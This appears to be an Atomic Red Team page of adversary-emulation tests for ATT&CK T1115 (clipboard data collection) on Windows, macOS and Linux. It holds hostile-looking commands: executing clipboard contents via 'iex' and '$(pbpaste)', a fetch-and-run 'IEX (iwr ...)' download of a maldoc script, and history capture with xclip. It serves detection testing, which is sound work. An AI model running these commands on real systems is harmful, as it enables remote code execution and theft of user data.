Try it using Invoke-Atomic

Clipboard Data

Description from ATT&CK

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)

Atomic Tests

Atomic Test #1 - Utilize Clipboard to store or execute commands from

Add data to clipboard to copy off or execute commands from.

Supported Platforms: windows

auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7

Inputs:

None

Attack Commands: Run with command_prompt!

1
2
3
4
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt

Cleanup Commands:

1
2
del %temp%\T1115.txt >nul 2>&1

Atomic Test #2 - Execute Commands from Clipboard using PowerShell

Utilize PowerShell to echo a command to clipboard and execute it

Supported Platforms: windows

auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
echo Get-Process | clip
Get-Clipboard | iex

Atomic Test #3 - Execute commands from clipboard

Echo a command to clipboard and execute it

Supported Platforms: macos

auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff

Inputs:

None

Attack Commands: Run with bash!

1
2
echo ifconfig | pbcopy
$(pbpaste)

Atomic Test #4 - Collect Clipboard Data via VBA

This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt

Supported Platforms: windows

auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52

Inputs:

Name Description Type Default Value
ms_product Maldoc application Word String Word

Attack Commands: Run with powershell!

1
2
3
4
5
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"

Cleanup Commands:

1
2
Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Microsoft #{ms_product} must be installed

Check Prereq Commands:

1
2
3
4
5
6
7
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

Get Prereq Commands:

1
2
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"

Atomic Test #5 - Add or copy content to clipboard with xClip

Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.

Supported Platforms: linux

auto_generated_guid: ee363e53-b083-4230-aff3-f8d955f2d5bb

Inputs:

None

Attack Commands: Run with sh!

1
2
3
4
apt install xclip -y
history | tail -n 30 | xclip -sel clip
xclip -o > history.txt

source